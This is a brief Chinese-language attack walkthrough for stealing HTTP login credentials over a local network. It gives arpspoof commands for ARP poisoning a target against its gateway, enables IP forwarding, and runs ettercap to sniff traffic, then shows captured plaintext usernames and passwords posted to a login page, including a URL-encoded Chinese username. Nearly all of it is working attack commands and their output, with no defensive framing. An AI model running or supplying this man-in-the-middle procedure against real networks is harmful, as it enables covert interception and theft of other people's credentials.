HTTP账号密码获取
Arpspoof --》 欺骗
Ettercap --> 欺骗 DNS欺骗 流量嗅探
目标机器:192.168.1.100
网关:192.168.1.1
Kali攻击者:192.168.1.101
arpspoof -i eth0 -t 192.168.1.100 192.168.1.1
开启IP转发
echo 1 >/proc/sys/net/ipv4/ip_forward
Cat 查看内容
cat /proc/sys/net/ipv4/ip_forward
ettercap -Tq -i eth0
-Tq -- 》。-Tq 启动文本模式,q安静模式
-i 网卡
149.225.129:80 -> USER: zhanhun PASS: 123456
INFO: http://hack-gs.com/login.php
CONTENT: username=zhanhun&password=123456
USER: zhanhun PASS: 123456
User : 用户名是中文 ?
HTTP : 211.149.225.129:80 -> USER: 战魂 PASS: 123456 INFO: http://hack-gs.com/login.php
CONTENT: username=%E6%88%98%E9%AD%82&password=123456
战魂